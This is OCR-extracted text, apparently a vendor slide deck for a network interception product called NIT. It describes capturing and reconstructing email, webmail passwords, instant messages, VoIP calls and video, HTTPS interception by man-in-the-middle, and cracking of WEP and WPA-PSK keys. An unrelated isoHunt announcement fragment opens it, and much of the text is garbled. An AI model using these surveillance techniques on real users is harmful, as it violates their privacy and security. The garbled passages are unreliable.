for you. We'll be evaluating how much extra load this places on our servers over the next few weeks, and if there's a large 
outpouring of people preferring to browse isoHunt or TorrentBox securely, we'll be investing in some dedicated hardware to 
handle the SSL connections. ( Soekris vpn1401 's have hifn chips with some very nice linux kernel drivers for crypto 


offloading, so they'd make our SSL stuff faster, and be completely transparent 0) 

Just a heads up: we did in fact buy certificates, but loading some pages may cause warnings due to ads and digg not being 
on SSL secured connections, so please don't complain if you see these warnings. Your communication to isohunt.com and 
torrentbox.com are fully secure when browsing under https://. 

Also, there's a poll attached to this announcement, PLEASE give us your feedback regarding whether you'll be using SSL or 
not. 

Reference: Stress testing experiment with redirecting all traffic to SSL (our servers handled it fine and SS did some optimizations to handle 


extreme load better) 


(20) Comments 


Firefox 3 released! 


Posted by SecretSquirrel on Jun. 17 


Mozilla would prefer going through their (seriously hammered) servers so that they can update their counters and go for 


@ Internet | Protected Mode: Off 


https://192.168.10.60/http/http reconstruct.php* 


Internet | Protected Mode: Off “а” ®100% ~ 
a 


Reconstruction - Sample HTTP - 


Upload/Download 


https://192.168.1.60/main.php - Windows Internet Explorer 


e - Y [E| htpsij/192.168.1.6 


File Edit View Favorites Tools 


CÈ Tools ~ 


Ve Be |@нир<:][192.168.1.60ут. 


Е-@ HTTP (LINK) (1500) ^ 


8192.168.0.152 (40 HTTP Content 
8492 168.1.103 (39 : : : 
8.192 168.1 17 (173 31. 2008-03-02 14:23:28 Download mirc631.exe http:-//software-files.download.com/sd/jV-jCvRPehQ CTOKD... 60.3K 
E192 168.1.237 (21 32. 2008-03-02 14:16:32 Download links txt http://diy.stomp.com.sg/links.txt 275B 
8192 168.147 (11) 39. 2008-03-02 13:51:38 Download receiveim.mp3 http-//mail.yimg.com/us.yimg.com/i/us/pim/receiveim.mp3 82K 
вош а 34. 2008-03-02 13:42:50 Upload demo 3 JPG http://mail.google.com/mail/2ui- 1&ik-ed3bbeG4f6&cmid-48 50.0K 
Я192 168 157 (83) 35. 2008-03-02 13:36:22 ^ Download 0103HLW002.pdf http-//www.todayonline.com/pdflive/0103HLW002. pdf 111.3K 
Е) @ HTTP (CONTENT) ( 36. 2008-03-02 13:36:14 Download 0103HLW pdf http://www .todayonline.com/pdflive/0103HLW001 pdf 89.8K 
81192 168 0.152 (52 3T 2008-03-02 13:35:44 Download newtickers.txt т: иие ааш 481В 
8492 168.1.103 (44 38. 2008-03-02 13:35:34 Download newtickers txt] ee са џем болек То window Бер 481B 


8192 168.1.17 (93) &- "ја је е не = .-- 
81192 168.1237 (21 :| 10 Submit | 
81192 168.147 (13) 
E492 168.1.51 (369 % 
8192 168.1.53 (135 же. жн 
[5] 8) 


А 


мч 1234 м 


* MEDISAVE 
* MEDISHIELD 
* MEDIFUND 


3 НТТР (DOWNLO 
8192 168.1.103 (38 
#1192 168.1.17 (1) 


My hospital bill cost me only 
9-89 TELNET (3) = 
| О, SEARC 17 | 
4 ALERT А 
ty EXPORT OR the last 30 years, Мат MediShiald. patients to keep her company!" 
i Shanmuga Thayee (below) has not There was also no MediShield With heavy subsidies, the majority 
се, been in good health. With seven deductible as it was already paid for in of Class C bills are very affordable, with 
E ча МАМАСЕ 7 pre-existing conditions, including Mdm Shanmuga's previous the median bill зіге at $580. Only а 
i x diabetes and hypertension, her hospitalisation in the same year. minority of bills, like Mdm Shanmuga's, 
Medisave fund has been depleted. MediShield deductible of $1,000 for аге high. 
1% REGISTER > эмпе wes Ооо чи les paid onyoncs ina" Evan thn, i Mada and 
diagnosed with a heart problem in policy year. MediShield, most patients only need to 
Qe LOGOUT - November 2006, she refused ounderpo — - pay a minimal amount out-of-pocket. 


| | 


71 Ө Internet * 10095 ~ 


Reconstruction - Sample HTTP - 


Video Streaminc 


Га https//192.168.10.60/main.php - Windows Intermet Explorer. 
Ele Edit View Favorites То 
г Favorites ЕЕ https://192.168 
чт шаған я 
+375 YAHOO (22) 
3-49 оо (10) | 
-T UT (1) 1. 2008-09-22 02:14:32 youtube.com + WotLK: Possibly ab http://tw.youtube.com/watch?v=y17Zu... 1,011.3K 
H- SKYPE (3) 2. 2008-09-22 02:14:32 203.66.48.35 + НТТРМОЕО SNFANr.f.. http://203.66.48.35/youtube/2/y17Zu... 1,011.3К 
+: 8 ОООСШЕТАЦК (1) 3. 2008-09-22 02:06:06 youtube.com + Gnomish engineer и...  http-//tw youtube .com/watch?v-Go2Fq 695.0K 
С) Еівс (2) 4. 2008-09-22 02:06:06 203.66.48.101 http://203.66.48.101/youtube/4/Go2F ... 695.0K 
#-@ ҒТР (22) 5. 2008-09-22 01:48:54 youtube.com http://tw.youtube.com/watch?v-X3 VP... 2.6M 
&- g P2P (13) 6. 2008-09-2201:48:54 203.66.48.36 . http://203.66.48.36/youtube/1/X3. ҮР... 2.6M 
ji аса к) (1322) 7. 2008-09-22 01:46:53 youtube.com | @ https//192.168.10.60/http/player.swf?file-/datas/20... (се ШШШ 14 7,15 24M 
s HTTP (CONTENT) (127 8. 2008-09-22 01-4653 203664836 | ШЕЙБЕ ааа fs. 24M 
8-39 HTTP (DOWNLOAD) (: 9. 2008-09-22 01:46:15 youtube.com СИСКА: w3i8c 984 6K 
#- в) НТТР (RECONSTRUC™ 10. 2008-09-22 01:46:15 203.66.48.100 i 984 6К 
SEA DEO STREAN = 11. 2008-09-22 01:45:37 youtube.com 1.5M 
8192 168.1.9 (6) 12. 2008-09-22 01:45:37 203.66.48.41 1.5M 
AAA. x 13. 2008-09-22 01:45:14 youtube.com 125.8K 
m97 168 1 142 ) 14. 2008-09-22 01:45:14 203.66.48.68 125.8K 
+ j ES 15. 2008-09-22 01:44:52 youtube.com 865.4K 
©, SEARCH 16. 2008-09-22 01:44:52 203664867 865.4K 
@ ALERT 17. 2008-09-22 01:44:15 youtube.com 125.8K 
(à EXPORT 18. 2008-09-22 01:44:15 203.66.48.68 па ulin em 125.8K 
8-%фҙ MANAGE 19. 2008-09-22 01:43:37 youtube.com || @ Internet | Protected Mode: Off E3stF.. 9704K 
{Ф REGISTER 20. 2008-09-22 01:43:37 203.66.48.38 + HTTPVIDEO YLhncH.f... http://203.66.48.38/youtube/2/E3StF ... 970.4K 
@ UPGRADE (TK 12 м Count : 22, Total:2,Inpage 1 | Вомз per page: 20 [Submit] 
4 ш 
| Е Play back reconstructed FLV video file 
@ Internet | Protected Mode: Off a  *^*1005 ~ 


Reconstruction - VoIP SIP/H.323 


RTP Voice Calls 


$ SKYPE (0) 
S GOOGLETALK (0) 
авс (0) 

= FTP (6) 

&- g8 P2P (1) 

| M AE GAME (0) 

H- HTTP (LINK) (41) 

%- @ HTTP (CONTENT) (36) 
-ggj HTTP (DOWNLOAD) (11 
H- à) HTTP (RECONSTRUCT) 
&Sf'vipEo STREAM (1) 
~ TELNET (0) 


#3 INCOMPLETE (1747) 


9-6 MANAGE 


4% REGISTER 


—@ UPGRADE 
~~ LOGOUT 


^ CATEGORY : VOIP 


m 


NO. 


1 
2. 
3 

4. 


5 


Date-Time 


2009-12-13 
12:01:55 
2009-12-13 
12:01:55 
2009-12-13 
12:01:55 
2009-12-13 
12:01:55 
2009-12-13 
12:01:55 
2009-12-13 
12:01:55 


Caller 


1818610044407 
1818610044407 
1918610044420 
118610044420 
818610044420 


1818610044420 


Callee 


83610000104 
8610000104 
8610044421 
88610044421 
1818610044421 


1818610044421 


Моде 


реег їо реег 
peer to peer 
peer to peer 
peer to peer 
peer to peer 


peer to peer 


Type 


SIP 


SIP 


SIP 


SIP 


SIP 


SIP 


Codec 
G723 


G723 


iLBC 


G729 


File Name 


+ VOIP. SeA5je wav 
+ VIP. DNSNJw.wav 
VOIP_kljWaP_wav 
+ МОІР GAWJF7.wav 
+ МОІР BGu6dq.wav 


+ VOIP. 6Sa3Tl.wav 


^ 
ПО] Windows Media Player 
[жт 


Now Playing 


8610044420 8610044421 


Now Playing ” 


» 8610044420 8610044421 


b 8610044420_8610044421 


00:03 


n ЖЕСТ уь ө ——e 


Time 
8 Sec 
8 Sec 
58 Sec 
50 Sec 
1 Min 3 Sec 


1 Min 2 Sec 


Reconstruction - Sample 


Incomplete Sessions 


а сао ^ CATEGORY : INCOMPLETE - 192.168.0.100 
UT UT (0) Бы. BSSID Source Destination File Size Туре Comment 


©з SKYPE (0) Lost 


S'GOOGLETALK (0) 1. 2007-10-13 09. 44-96-56-F6-F1 192 168.0.100-3115 222.139.143 73:80 INCOMPLETE Віпри dat 3.0K HTTP HTTP 
а 07:39:19 
“Кінс (0) Неадег 
Е FTP (6) 2007-10-13 ее 
»- pop (1) — 2. 2007-00513 00:11:95:55:F6:F1 192.168.0.100:3492 60.28.26.251:80 INCOMPLETE_twuXqJ dat 5.7K HTTP HTTP 
САМЕ (0) = 
H HTTP (LINK) (41) з. 20070-13 00:11:95:55:Еб:Е1 192.168.0.100:2494 202.157.142.198:80 INGOMPLETE. OinOKD.dat 84K HTTP HTTP 
H- HTTP (CONTENT) (; 208 Header 
8-439 HTTP (DOWNLOAL 2007-10-13 EM 
8 СУ HTTP (RECONSTRI | 4 073257 00:11:95:55:F6:F1 192. 168.0.100:2416 222.134 73:80 INCOMPLETE, NXrudP dat 618 НПР HTTP 
i VIDEO STREAM (1) [ (E) INCOMPLETE ОйтОКО 421 - WordPad — 
-E TELNET (0) = в. 2007-10-13 00:11:95:55:Р6Е1 192.168.0.1 Ee p gen pet Fem Dey 
= оз вв я »> во ъ 
File Download 


248 INCOMPLETE (174: 


БЕТ /images/FX30MBX.jpg НТТР/1.1 


i же i f Accept: */* 
i 192.168.0.100 (12 Do you want to open or save this file? Referer: http://www.ed-system.sg/ 
| #192.168.1.11 (173: E MMC изе 
i : : — DX 
5.8192 168.1 78 (2) Е) Name: ІМСОМРІЕТЕ OinOkD.dat Accept-Encoding: gzip; de£iate 
: @ Туре: Application, 8.41KB f-Modified-Since: Sun, 04 Feb 2007 15:20:08 GMT 
: 4 VOIP (0) EO чорт If-None-Match: "168024-6620-1cb3ba00" 
| Ұл Я User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; тт1їуе 
0, SEARCH SAYRE: МЕТ CLR 1.1.4322; .NET CLR 2. 0.50727; InfoPath. 1) 
i Open ] | Save ] Host: www.ed-system.sg 
- 22 ALERT | Connection: Keep-Alive 
іе B EXPORT СЕТ /www. ed-system. sg/ED%20small. JPG HTTP/1.1 
i 2 > d Accept: ж/ж 
a 95 While files from the Intemet can be useful, some files can potentially | . Ж 
i MANAGE - harm your computer. If you do not trust the source, do not open ог Referer: ВЕ, 6d avt en, si 
i $ wv save this file. What's the risk? Accept Language?) en-us 
Бы ны Ee E жағда UA-CPU: x86 
i REGISTER Accept-Encoding: gzip, deflate 


If-Modified-Since: Sat, 23 Jun 2007 18:53:14 GMT 

If-None-Match: "1680T9-al5-4abfba80" 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ТТ1зуе ЕНЕ; .NET 
CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath. 1) 

Host: www.ed-system.sg 
Connection: Keep-Alive 


4 т һ 


2007-10-13 nn 44 ессе. 
| Search ~ № 074143 00:11:95:55:Е6:Е1 192.168.0.100:1660 203.1 


For Help, press F1 


Data Search - Conditions & Free 


Text Search 


е https://192.168.10.60/search/search listphp - Windows Internet Explorer 


fe] https://192.168.10.60/search/search_list.php 


ALERT PARAMETERS Қ iE mem 
DATE : O~ © 
пме: | 
IP ALL | 
BSSID 
MAC 
Search ~ 
EMAIL: | - FROM FTO ACC ABCC =т= 
SUBJECT : 
WEBMAIL TYPE : s 
SERVER IP : 
ACCOUNT : ж 
P2P TOOL : 
P2P FILE : = 
САМЕ ХАМЕ : Ф 
1. 
MSN ACCOUNT: >. % 
SCREEN NAME [JPARTICIPANTS 


Q Internet | Protected Mode: Off ға” 100% + 


Location Estimation - Wireless 


ment Locator 


Utilizes Wireless Sensors and Triangulation Calculation/Training methodology 
to estimate 
the location of the targeted wireless devices (AP or STA). [Plane 


Wireless Самет List E. = 1 Wireless Network Topology 
p ТҮРЕ МА Pa i A a 
"m 0&04E-£4:5& 3 1 Ж — QD 

- 00:02-62:86 ~. t ; | | | 

- Ооо: ве: | - - ; 

- $ 000000404773 Д fd Г] ы 2128 

= С сверкали а Ba B BE m mi 

E ~ 0011-9 

E - 001% ч « / 

- Ey] 73129 315 ^ 

~ 


0690 CCEAR7 GPS 


А | 
Select the targeted Wireless 
Device to show the estimated 
the location 


Display of targeted device 
estimated location 


- 
. - 
ШЙ Traning proce completed 


Allow finding of approximate location of targeted wireless device in X-Y plane. 
ation error depending on surrounding environment (ex: blockage etc.). Normally a few met 


DECISION / /2 E 
tie б 
< 


Integrated Wireline & Wi- 
Fi/WLAN 
Real-Time Interception & 
Reconstruction System 
Network j 

TO 


est UAE RS E LEA users! 
(NIT) 


Introduction to Network 


What is the capabilities of ro 
N IT? “т | ч | 2 2 
* Intercepts Ethernet LAN "t 
traffic through mirror-SPAN 
port (or by using a network Ze 
tap). P 
* Intercepts WLAN traffic (up "е 
to 4 different WLAN usb Æ 


Lenovo ThinkPad X200 


С ha n nels) а USB WIFI Adapters 


* Intercepts Ethernet LAN 
based HTTPS/SSL traffic by Solution for: 


MITM attack. Lawful Enforcement 
* Intercepts WLAN based Agencies (Police 

HTTPS/SSL traffic by MITM Intelligence, Military 

attack. Intelligence, National 


Security, Counter 
Terrorism, Cyber Security, 
Defense Ministry, Secret 


* Real-time raw data decoding 
and reconstruction. 


Afflina raw Aata manal 


et 


NIT Implementation Mode - LAN 


NIT System 
Mode of Operation: 


Ethernet LAN Passive Interception 
Passive 
ЗЕМ Mode 


Router/Firewall 


Capture - 5niffer Mode 
irror Sniffer technology is used for capturing Internet 


SERVER FARM traffic/packets through port-mirroring switch. 


SWITCH/HUB [| Uplink port 


T 


NIT System 
Manage by Investigator 


чр 

Network 7% 
Users bs 

Another building /department/floor 


NIT Implementation Mode - LAN 


HTTPS Interception 


SSLSERVERS 


Network Investigation Toolkit (NIT) 


INTERNET LAN HTTPS/SSL MITM Intercept 


Active 
SERVERS M od e 


Router, Firewall 


Manage 


Administrator 
SERVER FARM 
SWITCH/HUB 


MITM Attack 
By: 
1. Connect to LAN Internet 
2. Connect to WLAN Internet 


3. Connect to 3G Internet 
Targeted Users Pool 


NIT Implementation Mode 
Interception 
Passive  NIT System > | 


Mode Modeof Operation: INTERNET 
WLAN Passive Interception _ 


ED 
(ШЕ) 


ШЕР — — —— — ‚ш — € ны 
= 
га 


~ 


Wirel ess, ST. A 


=. 
ый = 
- =. 
== ~ 
= 
~ 


~ F 
Wireless STA Wireless STA 
~ 


/ № 
ER: 
reless © H 
sees STA " | x 3% 
1 / 
/ a \ 1 \ ^ 
1 i ^ \ 
| Á ` | AP CH6 
| N04 ~. 
қ Ma E > — 
i s ©з 
“ ~ “. Е 
% ~ -4- = 


EE а жен ли жән жен Р Е 


Cracking of: 
WEP Key 
WPA -PSK Key 

NIT System (WLAN Іпегсер tional ) 
Intercept up to 4 concurrent channels 


NIT Implementation Mode - WLAN HTTPS 
Interception 


NIT | 
WLAN HTTPS/SSL MITM 1 INTERNET 
Interception | 


Active Mode 


Wireless STA 


y: 
1. Connect back to AP 
2. Connect to LAN Internet 


- | 
~ 1 № 3. Connect to3.5G Internet 
__ M = 
LE | 
“е... = 
— | a 


Wireless STA 


NIT (WLAN HTTPS/SSL MITM 
Interception) — System acts as an 
AP for the targeted user 


R'acking/Decryptlon от УУЕР/УУРА 


d System! 
128-bit key - 26 HEX 


au EP Key скар азо ттҮн can.be.done ом. 


2. WPA-PSK Key Cracking/Decryption:-- (Optional 
Module Available) 

WPA-PSK cracking is an optional module. By using 
external server with 

Smart Password List and GPU Acceleration 
Technology. 

This helps and increases the chance of WPA-PSK 
cracking for LEA. 

Countermeasure: Intercept at the ISP or Human 
Intelligence 


Notes: 
The time taken to decrypt the WEP key by passive mode depends on 


о р Е 


WPA-PSK Password Recovery 


45 Elcomsoft Wireless Security Auditor Lej8B, % | 


File Action Options Help 


е ча ы яя о ө 


Import ~ Create Open ~ Save Start Pause Check for Help 
data project project project attack attack updates contents 


Elcomsoft Wireless Security Auditor 


o Congratulations! The password has been found. 


Time stamp Message 


10:27:18 April 09, 2011 About to start new recovery: 2 CPU cores, 0 h/w accelerators 
10:27:18 April 09, 2011 Starting performance monitor 

10:27:19 April 09, 2011 Performance monitor started successfully 

10:27:19 April 09, 2011 Recovery: started 

10:27:19 April 09, 2011 Recovery: the password has been found :) 

10:27:20 April 09, 2011 Recovery: stopped 


Is is an optional feature! Additional 
system is required! 


NIT - Homepage - Status of 


| Lj http//192.168.1....n/frame/frame.php | + | М 


6! HOME | CASE RESULTS | 2 SYSTEM SETTINGS | Bl SYSTEM STATUS | 7 REGISTRATION] | 


GUI Refresh in 24 Second(s) 
Operation Mode : Ethernet LAN Mirror-Sniffer Capture Mode 

Case Name : default 

Case Name Import ID : ED-2010-01-04 17:39:19 
Created By : admin 
Created Date : 2009-12-01 23:09:35 

Database ID : EDE 1 

Raw Data File(s) Reserving Directory : /'home/admin/cases/default/ 


Services and Ports Information : 4 


Operation Mode Status : Running | Stop | 


The side has Has Has TM Lose Dro Drop TCP TCP UDP UDP 
Interface captured the captured captured Packet р Packet Packet Packet 
4 : Packets к Packets и Packets 5 Packets а 
time Packets Packet Size Size Size Size Size 
е0 6064 888653 255456 KB 0 0 KB 0 ОКВ 163366 ре 724398 р 


Display the current operation mode and status of 
implementation 


NIT - Case Results 


| |_| http://192.168.1....n/frame/frame.php | m | 


fi HOME | 2 CASE RESULTS | %2 SYSTEM SETTINGS | B) SYSTEM STATUS | Ё? REGISTRATION | 


default 


Case : default 


MAC Т A 
POP3 IMAP SMTP 
00:50:7F:29:58:11 0 0 0 0 6 Е 
00:24:21:A1:92:7F 13 0 0 5 1 0 0 0 0 0 0 0 0 0 255 231 
00:1A:80:5C:5B:DE 7 0 2 2 1 0 2 0 0 0 4 0 0 0 128 128 


i «« 1 »»EnterPage| || Go | 


SEB default | ч@ф 00-24:21:А1:92-7Е | Webmail(Read) 


Тоїа! 3 Тоїа! Раде 1 Сиггепї Раде 1 


Ша Webmail(Read) | Webmail Token Page | 20 

No. 9 Date-Time Account Sender Receiver cc Subject Webmail Type 

44. 2010-01-04 18:15:34 192.168.1.11 wedetective2@hotmail... wedetective2 Smart CCTV УАНОО2.0 Mail 

42. 2010-01-04 18:14:53 192.168.1.11 ^ wedetective(Qyahoo.c... wedetective2... Airshow YAHOO2.0 Mail 

41. 2010-01-04 18:14:53 192.168.1.11 wedetective1@yahoo.c... wedetective2 Google УАНОО2.0 Mail 

40. 2010-01-04 18:14:53 192.168.1.11  wedetective1@yahoo.c... wedetective2 Sing in the house УАНОО2.0 Mail = 
39. 2010-01-04 18:14:48 192.168.1.11 wedetective1@yahoo.c... wedetective2... wedetectiv... Re: Ja? ga g jal YAHOO2.0 Mail To p = D О W n МІ е МІ 
38. 2010-01-04 18:14:48 192.168.1.11  wedetective1(gyahoo.c... wedetective2... wedetectiv... This is the case УАНОО2.0 Mail 

37. 2010-01-04 18:14:48 192.168.1.11  wedetective1@yahoo.c... wedetective2 wedetectiv... all) ga p 2) YAHOO2.0 Май оп С ase 

36. 2010-01-04 18:14:46 192.168.1.11 wedetective2@hotmail... wedetective2... frankie@ed... Test Email YAHOO2.0 Mail 

35. 2010-01-04 18:14:45 192.168.1.11 decision@ed-system.s... wedetective1... wedetectiv... FW: allel) ga ¢ jill УАНОО2.0 Mail R It G U | 
34. 2010-01-04 18:14:45 192.168.1.11  decision@ed-system.s... wedetective2 wedetectiv... .\»JY!. article YAHOO2.0 ман e 5 u = а 
33. 2010-01-04 18:14:45 192.168.1.11 decision@ed-system.s... decision@ed-.. wedetectiv... terrorist YAHOO2.0 Mail 

32. 2010-01-04 18:14:42 192.168.1.11 decision@ed-system.s... decision@ed-.. wedetectiv... wow wow world УАНОО2.0 Mail 

31. 2010-01-04 18:14:42 192.168.1.11 wedetective2@hotmail... decision@ed- frankie@ed... Robinho arrested over alleged sexu УАНОО2.0 Mail 

30. 2010-01-04 18:14:42 192.168.1.11 juventus_ita@yahoo.c... wedetective2... frankie@ed... Mew Choo left out of All-England $ ... — YAHOO2.0 ман 

29. 2010-01-04 18:14:36 192.168.1.11 wedetective2 hotmail... wedetective1... wedetectiv... 2010 Vancouver Olympics costing YAHOO2.0 Mail 

28. 2010-01-04 18:14:36 192.168.1.11 internet-forensics@e... wedetective1 wedetectiv... Ronaldo gives Man United 1-0 win УАНОО2.0 Mail 

27. 2010-01-04 18:14:36 192.168.1.11  wedetective1@yahoo.c... wedetective2... support@ed... Test 1 YAHOO2.0 Mail 

26. 2010-01-04 18:14:29 192.168.1.11  wedetective1@yahoo.c... wedetective2... Test Email YAHOO2.0 Mail 

25. 2010-01-04 18:14:29 192.168.1.11 twitter-invite-wedet wedetective2 Frankie Chan wants to keep up wit УАНОО2.0 Mail 

24. 2010-01-04 18:14:29 192.168.1.11 frankie@ed-system.sg frankie@digi frankie@ed... Test Email..... YAHOO2.0 Mail 


Sample: Email (POP3, SMTP, IMAP) 


ft HOME | [5 CASE RESULTS | %2 SYSTEM SETTINGS | B SYSTEM STATUS | REGISTRATION | 


ЖІ default | чф 00:24:21:А1:9277Ғ | POPS | 


No. 9 Date-Time Account Sender Receiver 
2010-01-04 4 ue , B 
19. 18-32-39 192.168.1.11 frankie@digi-forensi... frankie@ed-system.sg 
2010-01-04 ^ 4 B 
17. 18-28-30 192.168.1.11 wedetective2@hotmail... ... kareem.samy@gizasyst... 
2010-01-04 : : B 
16. 18-28-30 192.168.1.11  wedetective2(g hotmail... mohamed.abuelkroushQ.... 
2010-01-04 , А а 
14. 0 18:28:30 192.168.1.11  wedetective2(g hotmail... ... kareem.samy@gizasyst.... 
2010-01-04 : | [=] 
13. Q 18-28-30 192.168.1.11 wedetective2@hotmail... inuniiofidecision.com... 
2010-01-04 5 : B 
12. 18:27-37 192.168.1.11 Mailer-Daemon(Qllion.s... frankie@ed-system.sg 
2010-01-04 : B 
11.00 18-27-37 192.168.1.11 wedetective2@yahoo.c... frankie@ed-system.sg 
2010-01-04 | B 
10. 18-27-37 192.168.1.11 wedetective1(Qyahoo.c... frankie@ed-system.sg 
2010-01-04 à : B 
9. 18-27-37 192.168.1.11 wedetective2@hotmail.. frankie@ed-system.sg 
2010-01-04 а 3 Bg 
8 LU] 18-27-38 192.168.1.11 wedetective2@hotmail... frankie@digi-forensi... 
2040 па па m 
$: i) Leeds knocks out MU from FA Cup, wins for Arsenal and Chelsea - Chinese Simplified (GB2312) | oe) x) 
File Edit View Tools Message Help ——— 
6 0) | МУ Reply f Керу АП MB Forward | па | T V ae 
From: Decision Computer <wedetective2@hotmail. com>; 
5. | Date: Monday, 4 January, 2010 10:00 AM 
Т 1 ті То: frankie@digi-forensics. com <frankie@dizi-forensics. com>; 


Subj А Cup, wins for Arsenal and Chelsea 


Attach: |=) computex2009-1,jpg (106 KB) 


LONDON: Manchester United suffered their most embarrassing FA Cup defeat for 26 years when Leeds 

|| United pulled off a stunning 1-0 third-round victory at Old Trafford yesterday. 

A 19th-minte goal from in-form striker Jermaine Beckford gave the Third Division leaders victory as United, 
|| who have won the Cup a record 11 times, went out at this stage for the first time since 1984. 

Holders Chelsea made sure there was no slip-up at Stamford Bridge where they crushed Second Division 
Watford 5-0 after streaking into a 3-0 lead in 22 minutes. 

Daniel Sturridge, John Eustace (own goal) and Florent Malouda settled the outcome with early goals 
before Sturridge and Frank Lampard scored in the second half to ensure Chelsea eliminated Watford for 
the second season running. 

Arsenal also avoided an early exit by coming from behind to win 2-1 against West Ham at Upton Park. 
Alessandro Diamanti gave the home team the lead at the end of the first half. The Gunners fought back to 
equalise through Aaron Ramsey in the 78th minute. Eduardo then came to the rescue with the winning 
поа! іп Ње 83rd minute 


cc 


wedetectiv 


mohamed di... 


mohamed di.. 


mohamed di... 


mohamed di... 


wedetectiv... 


Reco 
Subject 


Brazil nuclear plants m .. 
RE: New Raw Data Fi ... 
RE: New Raw Data Fi ... 
RE: New Raw Data Fi ... 
RE: New Raw Data Fi .. 

Mail delivery failed: ret ... 


Fw: Robinho arrested o ... 


Singapore Flyers 


Guardiola warns Ibrah ... 


Leeds knocks out MU f ... 


Novo rastreador satelit ... 


RE: ED system 


Pe 50 


Account 


frankie@¢ 
frederick 
frederick 
frederick 
frederick 
frankie@¢ 
frankie@¢ 
frankie@e 
frankie@¢ 
frankie@c 
frankie@¢ 
frankie@¢ 


frankie@¢ 


password 


frank 
decision2 
decision2 
decision2 
decision2 
frank 
frank 
frank 
frank 
frank 
frank 
frank 


frank _ 


Sample: Webmail (Read and Sent) 


|_| http://192.168.1....n/frame/frame.php | + = 


Ё HOME | CASE RESULTS | Ў SYSTEM SETTINGS | B SYSTEM STATUS | E REGISTRATION | 


2 default | $” 00:1A:80:5C:5B:DE | Webmail (Sent) | 


“Webmail (Sen) Recora/Page | 50 


No. @ Date-Time Account Sender PassWord Receiver BCC Subject SE 
2010-01-04 B l т сеа 
5. ii) 17:55:25 192.168.1.10 wedetective2@hotmail.. frankie@digi... Windows Live 
4 yiii 192 168.110 e" frankie@ed-s... Guardiola warns Ibrahimov ... Windows Live 
мч 1 мм Enter Page Total 2 Total Page 1 Current Page 1 
@ Mozilla Firefox m Sox} 


| http://192.168.1.12:888/general/common/decode/mail/openweb.php? TYPE-3& PARENT ID-5&mime val- &R 


| FROM: wedetective2 (hotmail com 
DATE / TIME: 2010-01-04 17:5525 
TO: frankie Z digi-forensics.com 


B н ins for Arsenal and Chelsea 
ATTACHMENT] 1. computex2009-1 jpg 


LONDON: Manchester United suffered their most embarrassing FA Cup defeat for 26 years when 
Leeds United pulled off a stunning 1-0 third-round victory at Old Trafford yesterday. 


A 19th-minte goal from in-form striker Jermaine Beckford gave the Third Division leaders victory 
as United, who have won the Cup a record 11 times, went out at this stage for the first time since 
1984. 


Holders Chelsea made sure there was no slip-up at Stamford Bridge where they crushed Second 
Division Watford 5-0 after streaking into a 3-0 lead in 22 minutes. 


Daniel Sturridge. John Eustace (own goal) and Florent Malouda settled the outcome with early 
goals before Sturridge and Frank Lampard scored in the second half to ensure Chelsea eliminated 


о Webmail Type: Yahoo Mail, 
"m cU DIA E ae CDI od суа кдл HTTP Gmail, Windows Live 


Alessandro Diamanti gave the home team the lead at the end of the first half. The Gunners fought 


back to equalise through Aaron Ramsey in the 78th minute. Eduardo then came to the rescue with Hotmail, Giga Mail and others 


the usnnina anal in the 83rd minnte = 


Done Fiddler: Disabled 


Sample: Instant Messaging 


| | | bttpy/192.168.1....n/frame/frame.php | + | " 
$} HOME | © CASE RESULTS | %2 SYSTEM SETTINGS | B SYSTEM STATUS | E REGISTRATION | 


m default | > 00:24:21:A1:92:7F | YAHOO 


35 YAHOO | “Download Tool Record/Page : | 50 | Confirm | 
No. 0 Date-Time Account User Handle Participants Conversation Count 


2. 0 2010-01-04 18:41:05 192.168.1.11 wedetective2 wedetective1 С 


мч 1 ње" Enter Page | | Total -Total Page 1 
Мола Firefox | 


111 http://192.168.1.12:888/general/common/decode/yahoo/yahoo_msg.php?_PARENT_ID=2&CATEGORY=YAHOO&RunAs=&mime_val= ү} 
33 Date-Time : 2010-01-04 18:41:05 | User Handle : wedetective2 Record/Page : | 50 
No. Date-Time User Handle Type Message Time started Finish Time 
2010-01-04 


+. 


Yahoo: Includes j| Mc 


wedetective2 Message hii am fine 


file transfer, E — 


18:41:20 Message yeyayaya 


webcam, voice call E 
(GIPS Decoder к 


wedetective1 Message hello... 


Required) ges 
MSN: Includes file — 


18:42:28 wedetective1 Message thanks 


2010-01-04 қ а 2010-01-04 2010-01-04 
transfer, webcam E NE HN-X ce 
7 E 200004 wedetective1 

2010-01-04 х " 2010-01-04 2010-01-04 
19:28:58 wedetective2 19:28:02 19:28:57 


юв 1 » m Enter Page Total 13 Total Page 1 Current Page 1 


Fiddler: Disabled | 


Sample: HTTP Link and HTTP 


m default | œ 00:1A:80:5C:5B:DE | HTTP Content 


No. Date-Time Account Content = 
397. 2010-01-04 21:10:48 192 468.1.10 [a | TeleStrategies ISS World Asia Pacific - Intelligent Support Systems for Lawful Interception 
Criminal Investigations and Intelligence Gathering 
396. 2010-01-04 21:09:40 192 168.1.10 1] | TeleStrategies ISS World Asia Pacific - Intelligent Support Systems for Lawful Interception 
Criminal Investigations and Intelligence Gathering 
395. 2010-01-04 21-09-30 192168110 1 TeleStrategies 155 World MEA Dubai - Intelligent Support Systems for Lawful Interception 
Criminal Investigations and Intelligence Gathering 
394. 2010-01-04 21-09-11 192 168110 ета еее producer of telecommunications industry conferences, seminars, 
393. 2010-01-04 21:08:54 192.168.1.10 [3 TeleStrategies' ISS World 
392. 2010-01-04 21:08:50 192.168.1.10 [] ISS lawful interception - Google Search 
391. 2010-01-04 21:08:41 192.168.1.10 [I Google 
390. 2010-01-04 21:00:49 192.168.1.10 17 AddThis utility frame 
389. 2010-01-04 21:00:49 192.168.1.10 м sr; (rm RM " 
388. 2010-01-04 20:58:17 192 168.1.10 ы $7701 Web Images Maps News Books Yanslate Gmail more v Web History | Search settings | Signin ^ 
387. 2010-01-04 20:58:17 192.168.1.10 М AddThis || == Ека [ Search | asaros sso: 
Search: © the web © pages from Singapore 
386. 2010-01-04 20:57:47 192.168.1.10 7 AddThis | |. _ А 
Web Show options. Results 1 - 10 of about 4,980 for ISS lawful interception. (0.23 seconds) E 
385. 2010-01-04 20:57:45 192.168.1.10 [1] ST701 рата Sponsored Links | Sponsored Links 
Е for HP Sn оше ачлы Lawful Interception Tools 
384. 2010-01-04 20:56:29 192.168.1.10 [1 57701 Nene SER Tools to help you work with LI data 
www.amesys.fr "Lawful and IP interception” Software security ... No obligation, free trial. 
